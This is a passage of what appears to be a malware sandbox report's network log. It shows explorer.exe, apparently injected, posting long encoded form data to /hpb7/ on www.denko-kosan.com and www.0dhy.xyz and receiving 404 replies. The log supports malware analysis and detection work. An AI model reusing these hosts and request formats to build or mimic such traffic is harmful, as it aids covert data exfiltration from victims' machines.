                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          17192.168.2.34971549.212.180.9580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:52.062103033 CET539OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.denko-kosan.com
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.denko-kosan.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.denko-kosan.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 77 6d 61 38 57 44 39 4c 6e 50 6d 74 39 6a 30 48 67 6f 69 67 48 30 6e 70 72 62 59 44 6b 55 70 6e 50 38 78 67 79 5a 6d 6e 7e 42 58 59 6a 70 45 77 4b 4a 28 55 51 6d 28 5a 5a 4a 70 53 75 74 58 33 52 77 73 57 35 61 4c 45 48 64 71 35 78 6e 59 46 53 4a 69 6c 54 39 72 36 4e 79 47 41 4e 66 33 32 79 54 75 72 36 32 34 30 68 43 34 61 50 37 76 6b 71 39 71 77 6a 67 54 42 70 45 50 6e 44 34 45 2d 52 73 4b 77 74 67 73 79 70 4b 63 39 6c 42 41 51 38 41 4b 62 50 63 6f 6b 54 69 4b 7a 65 65 37 76 50 72 67 49 6f 36 75 44 56 74 4a 58 76 71 73 47 48 6a 45 5a 72 57 76 58 38 74 74 79 31 7a 34 4a 31 6d 4d 31 57 59 42 50 5a 38 69 6f 45 62 35 45 58 4f 4f 6c 6e 38 7e 4b 6a 6c 4c 4f 78 37 39 30 53 69 35 30 70 78 4e 37 43 6a 33 43 49 6c 39 31 34 69 56 6b 4d 45 4d 69 62 4e 28 54 30 35 52 63 30 55 49 58 46 57 34 46 56 33 41 48 61 45 66 56 47 4a 66 53 37 32 73 6f 42 6f 68 50 72 53 56 33 48 73 56 34 7a 58 49 36 79 54 56 46 49 5f 49 4e 4b 6e 48 4c 31 33 75 4f 61 37 30 49 41 38 74 4e 4c 6f 77 36 4c 71 6b 49 31 35 6f 5f 73 32 55 4f 28 5a 41 74 46 34 52 45 54 44 42 76 28 31 52 30 75 6f 7e 4c 7e 4a 47 6f 7e 73 48 7a 76 42 44 71 75 6d 78 61 54 76 54 6d 30 4d 6c 33 57 54 4e 4f 71 79 42 5f 47 32 73 68 6a 66 4b 48 78 73 76 71 30 6b 51 75 45 6c 7a 78 43 37 43 6d 4e 55 46 73 6f 72 54 2d 58 51 4c 64 67 32 73 37 49 33 6a 50 62 79 54 5f 50 66 58 65 71 44 72 49 67 4e 37 37 78 33 28 61 6e 70 38 69 30 67 49 71 68 49 6f 39 49 49 39 4a 4a 68 63 35 28 56 28 62 33 6f 65 65 76 41 4e 65 66 70 32 62 67 62 6a 6f 34 31 67 6a 44 53 6f 71 30 59 50 4b 31 6f 75 46 6e 57 4c 49 42 52 48 61 69 31 46 61 4b 66 4a 46 6f 63 6c 6e 67 6b 45 43 34 59 66 32 65 33 69 75 75 5f 47 2d 4f 55 57 62 55 55 71 56 30 61 63 34 6e 31 41 4d 43 64 35 6c 53 70 6f 33 41 49 76 65 76 33 39 73 4c 45 4f 71 28 5f 32 71 69 42 53 69 56 30 63 6a 36 34 4a 6f 79 43 64 57 67 71 76 5a 49 6e 76 52 73 36 4f 2d 76 77 47 57 7a 5a 72 6b 66 61 39 48 5a 64 35 79 75 6c 4f 6f 48 4e 43 50 79 72 77 56 78 43 4d 72 79 46 6a 41 63 4b 51 50 7e 47 54 36 48 56 62 76 65 7a 4a 30 6d 66 57 42 4a 4b 43 4d 56 4d 59 52 6a 62 37 77 34 72 51 68 68 5f 52 56 28 6a 34 34 58 41 76 72 6e 43 50 6d 59 53 59 61 66 31 30 52 77 70 52 6a 33 68 28 46 47 57 45 53 75 63 33 65 6c 51 54 38 79 61 35 6c 7a 77 48 48 6c 69 6e 42 66 54 6d 56 46 74 79 61 43 58 7e 35 37 4e 55 53 7e 47 4d 4c 34 77 43 74 4f 4d 42 6c 77 48 51 7a 71 38 7e 77 46 36 58 55 55 76 68 57 57 5f 62 65 32 62 7a 64 75 66 28 48 50 56 63 6b 72 36 67 6c 4c 46 76 68 79 6f 61 4b 51 73 34 4c 4b 53 37 31 58 33 68 48 56 33 61 79 39 59 35 38 67 73 53 30 78 64 72 6f 58 4b 4b 41 32 6a 74 46 38 74 57 43 51 44 71 6f 6c 47 59 64 6b 4d 51 46 38 6c 4e 35 59 42 47 77 6d 50 34 77 4d 7a 6b 63 5a 5f 54 31 76 57 55 62 6e 2d 68 6e 47 66 4e 72 4e 65 6c 56 4f 38 30 36 45 67 43 72 28 58 41 32 67 73 52 41 6f 5a 46 49 54 75 45 64 72 6b 62 79 59 30 5a 70 71 78 35 63 56 78 63 45 37 4d 4d 69 30 5a 44 70 37 70 58 32 79 64 7a 47 46 4e 6f 6d 34 69 6f 66 45 69 6e 47 49 75 30 46 53 7a 7a 5f 56 4b 6e 50 79 79 64 78 54 37 75 38 4f 6c 50 5f 44 6a 34 69 31 4d 6b 39 71 71 7a 35 7e 4f 4e 36 79 70 74 72 4b 75 64 48 6d 59 32 47 7a 4d 68 34 79 38 70 43 58 51 33 2d 6b 4f 41 52 66 38 6c 4a 36 37 78 6e 53 66 7a 42 67 49 28 67 6e 4a 32 59 72 4c 63 67 6a 33 5a 75 33 68 4d 5a 64 41 34 65 55 45 6f 7a 42 71 57 37 54 38 56 52 45 73 52 73 74 4d 39 52 4d 46 51 6d 43 6f 53 6d 77 44 4e 57 42 61 6f 51 68 77 5a 41 7e 53 79 62 7a 57 58 57 75 76 56 52 68 76 78 4f 72 6d 77 33 31 69 78 50 66 59 70 5f 43 72 72 4a 44 5f 69 48 52 6a 36 56 6c 67 31 57 35 41 58 47 59 49 43 55 72 6d 53 38 64 66 6d 70 75 33 37 37 70 72 75 54 4c 77 55 74 62 59 4a 53 35 50 63 4a 77 4a 68 67 33 64 56 51 6e 6a 4d 77 43 67 49 55 63 79 35 43 61 44 55 61 66 46 48 71 32 64 6e 52 66 64 71 52 39 43 5a 44 51 4f 4d 74 30 5f 69 58 68 33 6b 57 6c 48 66 4d 47 63 46 56 6b 62 69 78 34 51 54 58 55 77 7e 78 7a 61 41 59 4c 4d 58 72 61 33 32 45 34 54 28 73 6e 59 41 2d 64 57 53 46 39 4f 4e 49 69 59 28 4a 59 43 36 46 55 4c 69 49 28 70 4e 48 52 4f 47 58 66 68 53 55 35 62 49 6b 38 70 6a 36 6b 6a 33 4e 31 41 54 30 74 6f 61 65 30 79 63 63 77 4f 32 62
                                                          Data Ascii: bcX3Uv=AsvgeLDfpdKZwma8WD9LnPmt9j0HgoigH0nprbYDkUpnP8xgyZmn~BXYjpEwKJ(UQm(ZZJpSutX3RwsW5aLEHdq5xnYFSJilT9r6NyGANf32yTur6240hC4aP7vkq9qwjgTBpEPnD4E-RsKwtgsypKc9lBAQ8AKbPcokTiKzee7vPrgIo6uDVtJXvqsGHjEZrWvX8tty1z4J1mM1WYBPZ8ioEb5EXOOln8~KjlLOx790Si50pxN7Cj3CIl914iVkMEMibN(T05Rc0UIXFW4FV3AHaEfVGJfS72soBohPrSV3HsV4zXI6yTVFI_INKnHL13uOa70IA8tNLow6LqkI15o_s2UO(ZAtF4RETDBv(1R0uo~L~JGo~sHzvBDqumxaTvTm0Ml3WTNOqyB_G2shjfKHxsvq0kQuElzxC7CmNUFsorT-XQLdg2s7I3jPbyT_PfXeqDrIgN77x3(anp8i0gIqhIo9II9JJhc5(V(b3oeevANefp2bgbjo41gjDSoq0YPK1ouFnWLIBRHai1FaKfJFoclngkEC4Yf2e3iuu_G-OUWbUUqV0ac4n1AMCd5lSpo3AIvev39sLEOq(_2qiBSiV0cj64JoyCdWgqvZInvRs6O-vwGWzZrkfa9HZd5yulOoHNCPyrwVxCMryFjAcKQP~GT6HVbvezJ0mfWBJKCMVMYRjb7w4rQhh_RV(j44XAvrnCPmYSYaf10RwpRj3h(FGWESuc3elQT8ya5lzwHHlinBfTmVFtyaCX~57NUS~GML4wCtOMBlwHQzq8~wF6XUUvhWW_be2bzduf(HPVckr6glLFvhyoaKQs4LKS71X3hHV3ay9Y58gsS0xdroXKKA2jtF8tWCQDqolGYdkMQF8lN5YBGwmP4wMzkcZ_T1vWUbn-hnGfNrNelVO806EgCr(XA2gsRAoZFITuEdrkbyY0Zpqx5cVxcE7MMi0ZDp7pX2ydzGFNom4iofEinGIu0FSzz_VKnPyydxT7u8OlP_Dj4i1Mk9qqz5~ON6yptrKudHmY2GzMh4y8pCXQ3-kOARf8lJ67xnSfzBgI(gnJ2YrLcgj3Zu3hMZdA4eUEozBqW7T8VREsRstM9RMFQmCoSmwDNWBaoQhwZA~SybzWXWuvVRhvxOrmw31ixPfYp_CrrJD_iHRj6Vlg1W5AXGYICUrmS8dfmpu377pruTLwUtbYJS5PcJwJhg3dVQnjMwCgIUcy5CaDUafFHq2dnRfdqR9CZDQOMt0_iXh3kWlHfMGcFVkbix4QTXUw~xzaAYLMXra32E4T(snYA-dWSF9ONIiY(JYC6FULiI(pNHROGXfhSU5bIk8pj6kj3N1AT0toae0yccwO2bwxJCe6b4PKcafTzXlOg7DBXzspB-57Y1Mz6tLzAU2_3F8xAUnP8Pwnc_hF7X8QaZEFg0RMy5y0HYqfb5PANZ8MYz9LWjEhtu(Jxd4wzp4st9To49dEqGKfMUfgiiz0Et0r(MvBP3D_xwNawnY7tHrS0wQe5i2IAQyIxnHLMf2wSPLKwOYNyF1mQrQrPE83cbcJLhDqlO22Ns5FXhM51kekCs9Dz3S4iDjotz8OQM0um1Krj6jhwuC6~cXzcKX9RukLeIXcWtPTWzrzfy0gTC8hgbIumrY7X4hWm4S6iw6Yt6Rwe2t4bItrt40GdJV-8xWZdWsJGzzAZ_LMt5XFY63dIndrWHuvAjQYEzZs~pUjz_EO2yqV4mNaemXSuDbG4khdn2Qqn-8jxoIM9EfIK-0cmivJXcI2yEhQEwHy3_GeWPSINBrworMG5mLnLfgi2CNdE6OFBjqRyx1VNP4NTw(sM7aJ10jkyqAspHz0jEpBlOvRFhf_Y2IFfUpn5HOUEcDyXGdHs3r7WDwVdIYO63FN6VsaaC(sguZghktZdsTrgYHr45oRrEgn7gHcMBB-UqpXzM4giXsj2Ym8zxIQWJqQrD9Z96oe9J6xLnGe(R(wRHuiQXHmB3WMkQJhZp0IzxmOsEb-jdWG2vFcQ2vNzlFzcP8XgF7TC0JiwXEtAS6uqfTf6s2fGdwZXVOBOuzwYk9rP-D07cV9YZkK8ZCIr1PxSsy1Y_l-IWcGTxF0ocCRbuJUEuJCdK7SppBEf3KvHMs9U2ozGNtll5~4vXGIeUyXFcdJswBu9CVVOZnzSHW6CG4NIFwYU1FUxfB7jAImsDqN5ZIwFqTQS7zSSbFmdWeUs7R9mxczQZt1abs0hF9hm6WoGjkny9YDeOE7gvGh6aEAhdakI2QkUSt-cwjwrLp6zwfH9UPQFGxAf2S3xJUf2ZK4609NA3RiNmOXGf8wcCBaAeBpUdkVQbR_Jnjq5uFGNuQ5qGMcfvUhyWuZrqBZivRZIh~4MwBq2HyC2phodMsLfkyMgaEAkQ90YixBFsf7X4fiHRl0AqzOEn1XJQk8mR2BIlTIUeE1TnDeypQBwRMhn3ImRRH2ZtMZqB5db3FNAByroQt_1qiaVcjmpMmgu1B2E7EJuGTM95B64ihSMihHlsZ77iDoesamoNwmDlqmGgl0rFDbY072sHDkfsEWBHXMrXH4xl7gYNAKtzx2htNMM_U_DNVqq88Ots8J6mqLL6YrLiKA0YlLMzbN9teVXvCbJ-u6GwxqNVWK~RTcKtcEypu_rUPok7DmSmWnlCeKulh9WtyQccbU107fkTsXzWQ5grBhP4NNREGlLlJaPMV6eJskCSHhYV2Hr9eJhfFMfuBlWYpQGA5HyaLxFBUUSG8lV4tJ1enxv2Rz1h3MmNSU3pa8ZRRWuW71XtqF(me0W3~8U9hqkc(jEHLltUvMoAwDulACHDlzcN8Mif~NQPOquDgThKuF9mQEb3BcDaEU8fO5N4JJ37ucRPPcYVcrAuoWYuNXAtyeFDyfeYJLZER5cQG1BC0zeErql7611fikWLlZ92N3cY1edv0m(dg4e4hM~5rQypPwaZzrSt3ywy~7NgQyeR(wDXd12Bi2phD-hx2RIaWGFyI1zx0A78xaLttxxil4BwFojbejLjpNd3IiTS2ESRf4wPXhg0MdtsGg0HbO5M4vYtkTiZjFHVrgVPy2QKnyttFIShvFuLAsnkQOxNf2mu5ATt4lnycdNKRqwo8c(L39xPsbK49HoNR5ng1cfqQuaPsdr4fRA8EIAyMnjnJhqqKJTfj4bceTyNh4jcMTijdyArZpsR5dw1yty3vwwsK-lkTX94hPeng1BjHXrgSIutHDrAlzMbeDx9kYJzdMtIEqG9FfGntWir39vlWh8ZwcUwu0Fb8RcFz1SbCbdO(D0LBLAC4z(jIMA839ZXbi8GWXhYZceMZBH8ckwV41lP(646p-5QAil6LMO5CPNWP_~a(k62pqw76NbwUo4hRhAeh1q9xI8Oy0LDDPNKdd3225UaW3Ba2kwrYRBl4c2Gln520Czxojjnd6elmQYZCK5jnVSIbz5eIzCmXn8tJUBlhwJO7Q3XKxlAr1wjhmIcg6fojS2BwrB9z032OYh4OYg6hVE1BFlYGBWMPEM-86wt2ZQPjJSfRPH0wuFAkfx9yIezJI~WDfUdX8AzKcY2zrvhBYCkAP84ePf0c6hyWMvMTCUDu70QdQvdSUexNUzK21EWkzwbiU(eyGRQaPcNmv3v6eeVgwTjyq(hGTkAJO5ybcV-SaGsA3AiOUcbOmM8ZxSfMRhkCeTOaOw4SwWKH2RbAmOeFi5PF8vynlZyuQNq5uE9tt3SHQeILFGi40AMptPtoWQunJiIEuPnHZG_chCcN12y4F4tfJ8KQ0nHAV6MNm7b2-ZGCcKz8-eJcjrxfu2xgrEHqlXcg-4QBO6GQNhQjXvr3VGvV0BGN1fJFukYJw~VxMaSrPoZuOtQkMdOK8~585oZV_nllv8h(XHHABF719jFBTUzIS9d9LTdCNIAyYMKtGEN9npKPXHsvX(6mQJnh0B2(w8Mmio4QHH3MUZXzbH97Ye6TrInO5SyVhCfGvKKch63IFKWCOgTI9bi0dlusqxfi6CjadUzBXofICDhFici5wc7NA~M2G~-S-EbMWVzInn1YvWFjrzW7HulSm2E0KJF9EcMu1CVi-a9inZ6a0TZT_0
                                                          Mar 21, 2023 08:08:52.362633944 CET540INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:08:52 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 196
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          18192.168.2.34971649.212.180.9580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:55.578836918 CET541OUTGET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1
                                                          Host: www.denko-kosan.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:08:55.886961937 CET541INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:08:55 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 196
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.349700198.46.160.9780C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:07:38.452894926 CET254OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.0dhy.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.0dhy.xyz/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 34 68 74 50 54 51 2d 4e 47 6e 6d 4f 53 53 69 4a 52 59 77 68 55 6b 59 30 51 73 54 44 41 69 50 76 4f 6d 47 62 32 35 6f 79 67 56 62 49 70 69 79 41 37 46 65 42 51 77 54 33 70 71 45 4b 6a 54 70 7a 67 42 57 39 77 61 43 66 69 61 4b 7e 37 53 64 43 76 64 68 4a 4a 74 55 69 36 39 6e 71 46 4c 42 51 67 4f 30 32 51 59 71 50 76 31 74 39 47 33 5f 7e 34 45 39 6c 68 59 4a 6f 41 33 36 56 4b 4d 33 4e 79 65 56 74 47 6f 5a 75 57 38 7a 51 52 6e 5f 58 78 34 76 76 31 6e 43 70 57 79 6f 38 57 69 71 4e 58 44 6a 54 38 4a 6b 78 71 64 59 79 66 28 46 37 44 6c 6d 50 65 53 56 33 58 32 4c 38 69 43 69 73 6b 6b 51 4c 65 4f 4b 58 59 37 6e 68 43 74 74 49 65 6e 78 79 37 33 77 4c 2d 45 4b 43 4b 72 31 52 76 4c 76 7a 33 5a 4f 51 46 6b 31 62 41 31 6a 51 4e 75 4c 67 70 63 63 77 55 71 76 63 45 37 38 6f 76 6f 4d 32 68 35 78 79 42 64 35 48 6c 38 6e 45 6e 69 64 50 32 46 39 76 79 6f 47 67 5f 77 36 4b 50 52 5a 4e 61 54 35 42 4a 28 6d 47 46 71 61 71 79 46 79 47 66 37 7a 77 56 28 49 45 52 46 4c 51 4b 6f 54 73 6e 41 5a 73 64 70 55 31 6e 36 4f 62 5a 50 52 48 30 32 57 68 46 31 6c 77 6f 28 46 4d 67 32 75 57 6b 49 47 76 2d 75 50 30 39 39 63 5a 39 6a 57 6f 4f 32 69 34 36 56 54 43 64 7a 76 77 62 4a 67 63 56 62 69 35 69 6a 67 68 4e 69 5f 28 46 73 6e 37 46 56 51 37 61 6f 66 45 78 55 53 45 4a 52 77 37 47 37 43 30 6a 4d 38 4c 78 41 33 6c 32 53 4e 79 56 74 50 44 38 65 31 5a 45 46 34 6f 71 61 44 53 45 38 61 45 4e 64 39 39 44 52 56 45 68 6c 7a 78 41 65 6d 53 34 75 42 70 35 32 4b 30 6d 66 5f 4e 34 66 51 64 43 62 5a 54 77
                                                          Data Ascii: bcX3Uv=MpN4BcIXuYXZwYFw8X~O(1yNQyvZtYfcx-1PxbNXbV2o(HFcCH3yIQcI3PoZLU85qZDjwqwf74AcYTXAcCuyF4MMdSKeloo45YV0J4TDkWj56fX4zEvSo0VX7ugF0SysbqP3u-xtMpFoWTKtJrO0n62CYpTn21uAGnT6uswSvLgBf3WKFiZaudOu2JhYyRBOc7qHGRJbrUVBGyo1ur0dZ07EcW6VdobWqY9zOUTOxn~Z3eax0iIai7wFOr3GA3M69HHUrG6F8934HS9EKrXm8hY8tUlHg2nNYBa7tqKp2TIM7_45zuCaG2BQLFetftYHqwLosk3lsxsofMxBnLQKrCkgl8nhKkiRv1gZGUQGyfp35UOTPUUTfjGkSN8GUFGRKO3Xdfam~PFwguIM6iecOlNzTaLn7RuQLWFvmO~m~eGEbXbO02r7aDlbi1KqK2P7DGi8y7IyX2FFwlTvG4TJV89qytW1pMbM1UIZi_H5a2d03l6r7L0gWaKaAVtUNEvX9Z7zoJmOtT3mXI1asxH0fbNNjpLFfXKuK9qrxumZ3QQdR5nSPELuxgWlkE~1B7ZLUXqNrJi8LR8BieKLcAuypnzqqqvoFFwFnxwmvfBg47cuCHpAFi8UWuYwTIJIRZ(RASNQFORwvmEihtbkaYltg45obk~GFvI-qv1ZEWeFXEhk4YFa0B3LGKrOBAQWX0z47LsF2fpaTpE6SY6Ra_wCm7dK~hXSXgLXfcJGyGBtGj4kfcfjbRmy(FS3v5RjhdkYKOb0~RqinNP0u48A1N(odcagWMx3fi~kS_9EBEGH3iW7UktQsx5WEQUDTe6_VDAXZ9y86igdRKwmprHnfdIWCjB91yYCw_V4htPTQ-NGnmOSSiJRYwhUkY0QsTDAiPvOmGb25oygVbIpiyA7FeBQwT3pqEKjTpzgBW9waCfiaK~7SdCvdhJJtUi69nqFLBQgO02QYqPv1t9G3_~4E9lhYJoA36VKM3NyeVtGoZuW8zQRn_Xx4vv1nCpWyo8WiqNXDjT8JkxqdYyf(F7DlmPeSV3X2L8iCiskkQLeOKXY7nhCttIenxy73wL-EKCKr1RvLvz3ZOQFk1bA1jQNuLgpccwUqvcE78ovoM2h5xyBd5Hl8nEnidP2F9vyoGg_w6KPRZNaT5BJ(mGFqaqyFyGf7zwV(IERFLQKoTsnAZsdpU1n6ObZPRH02WhF1lwo(FMg2uWkIGv-uP099cZ9jWoO2i46VTCdzvwbJgcVbi5ijghNi_(Fsn7FVQ7aofExUSEJRw7G7C0jM8LxA3l2SNyVtPD8e1ZEF4oqaDSE8aENd99DRVEhlzxAemS4uBp52K0mf_N4fQdCbZTw5bqbatGmTrPsuPZxDzrVSu4noL4wqzFURM69E38u401nstMffsvuAABme_rGuEWMUAV84AKqsFOivqzmyGRHqGhQ2LqCrjGs5aVB2JpiZPT4uaLcwujpHEK3O0lqfnxYU8ckRksNYqIO97GXAVDWYM94rv1jOL(7WhSlYB3PW1UtlrnfqRrEbWUYpENPWEnQ9fZDAMdlHFsjMrhS0kFCyRNwOqbylOLQVtLRb8OL6z30ICB_JmTdLovRZcE2hi9QvR7x8oZfdUCM(qwZwBbknX93GBZX4i3aMoGeCjnIuVcyrisuiKl6fQTbkvfCy4nH77Ex0CyeC577fhhCyOmBOd9T23amPzqRmlBCemE_f0TjkOOvq6RfAAeqUAc619kH~RGqwz98A652VuJ6x6w2DCU_D-rgYItFmB(AWLmcga7K1L0ylZLIxsgV2Q3KR-4z2WZR4pZQy7ILfWFrBEfUQDHlp-XWrWD7iegHEZ~ZRLYZ~8p7~JXVnShQmUoJbSFOyPsbObDY0-K4obz9FbK9~DpQNvayk_H7PePk~-8kkeHcTO6Il15DMLPXh911BK9McLR_kIRYqb5tXGSxHdcyC-3OGE0KumLwcP9ISKOBwhRv5bwRZ303s4yQrCt35vL5C5H12m6_0X85shoBrdy0ys1q~om2q1BPT6aGKAiThDGFcplpm2Fk(E9qETr80K5TUGH-rVJhwTY7Ll7AGTr3d5B2P7Go1EaTG8ofef5vTagqrvaPtaNF26W82hWS6HnWHLThT1nRC8dANmeGPp8QLMcLo8nuutjkAjOmbY6cwuwRNd4cVWIM13MqF_BbwC3lOm4FUZr2SdMY8EMF6Hx9oQ7VkDjhgzb4t3paIYwaTVUskYti1EKWH2xSkqXKcsEDSrdwPTx8UqGm5j3MDazQzQxdXgd9MdKgQVlqa9lrkr(Q6TZ1bHS7EmwcLEBO0m3IwcngJyEcab9gbvA1kNMdZE0zf_vGTkReUn7EuhmtLCPyU8xzelSyOb1NCfOqaCVRaxN-NribnXuHKi9emMPW7nfEJgmzoCRGOhstr-B36RodI5Tsi1q5ErsUekBaVsMbkG~zG8AVbdYdY_SHKJMtuAG3p5O62cm5pbrPdlDmo